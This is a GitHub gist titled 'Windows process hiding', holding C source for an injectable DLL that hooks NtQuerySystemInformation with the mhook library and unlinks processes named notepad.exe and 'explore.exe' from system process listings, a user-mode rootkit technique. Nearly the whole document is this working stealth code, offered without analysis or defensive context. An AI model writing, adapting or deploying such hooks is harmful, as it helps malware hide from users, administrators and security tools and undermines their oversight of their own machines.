Last active
December 29, 2015 17:58
-
-
Save jonathan-daniel/7707305 to your computer and use it in GitHub Desktop.
Windows process hiding
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <SubAuth.h> | |
| #include "mhook-lib\mhook.h" | |
| #define PROC1 L"notepad.exe" | |
| #define PROC2 L"explore.exe" | |
| enum SYSTEM_INFORMATION_CLASS | |
| { | |
| SystemProcessInformation = 5 | |
| }; | |
| struct SYS_PROCESS_INFO | |
| { | |
| ULONG NextEntryOffset; // | |
| ULONG NumberOfThreads; | |
| LARGE_INTEGER Reserved[3]; | |
| LARGE_INTEGER CreateTime; | |
| LARGE_INTEGER UserTime; | |
| LARGE_INTEGER KernelTime; | |
| UNICODE_STRING ImageName; // Process name | |
| }; | |
| NTSTATUS (__stdcall *origNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); | |
| NTSTATUS WINAPI myNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SysInfoClass, PVOID SysInfo, ULONG SysInfoLength, PULONG RetLength){ | |
| NTSTATUS Return = origNtQuerySystemInformation(SysInfoClass, SysInfo, SysInfoLength, RetLength); | |
| if((SysInfoClass == SystemProcessInformation) && (Return == STATUS_SUCCESS)){ | |
| SYS_PROCESS_INFO* CurrentStructure = (SYS_PROCESS_INFO*)SysInfo; | |
| SYS_PROCESS_INFO* NextStructure = (SYS_PROCESS_INFO*)((int)CurrentStructure + CurrentStructure->NextEntryOffset); | |
| while(CurrentStructure->NextEntryOffset != 0){ | |
| if((wcsncmp(NextStructure->ImageName.Buffer, PROC1, NextStructure->ImageName.Length) == 0) || ((wcsncmp(NextStructure->ImageName.Buffer, PROC2, NextStructure->ImageName.Length) == 0))){ | |
| if(NextStructure->NextEntryOffset == 0){ | |
| CurrentStructure->NextEntryOffset = 0; | |
| } | |
| else{ | |
| CurrentStructure->NextEntryOffset = CurrentStructure->NextEntryOffset + NextStructure->NextEntryOffset; | |
| NextStructure = CurrentStructure; | |
| } | |
| } | |
| CurrentStructure = NextStructure; | |
| NextStructure = (SYS_PROCESS_INFO*)((int)CurrentStructure + CurrentStructure->NextEntryOffset); | |
| } | |
| } | |
| return Return; | |
| } | |
| int DllThread() | |
| { | |
| HMODULE hNTDLL = NULL; | |
| while(hNTDLL == NULL) | |
| hNTDLL = GetModuleHandle("ntdll.dll"); | |
| origNtQuerySystemInformation = (NTSTATUS (__stdcall*)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG))GetProcAddress(hNTDLL, "NtQuerySystemInformation"); | |
| Mhook_SetHook((PVOID*)&origNtQuerySystemInformation, myNtQuerySystemInformation); | |
| return 0; | |
| } | |
| bool WINAPI DllMain(HMODULE hDll, DWORD reason, LPVOID reserved) | |
| { | |
| if(reason == DLL_PROCESS_ATTACH) | |
| CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) DllThread, NULL, NULL, NULL); | |
| if(reason == DLL_PROCESS_DETACH) | |
| Mhook_Unhook((PVOID*)&origNtQuerySystemInformation); | |
| return true; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment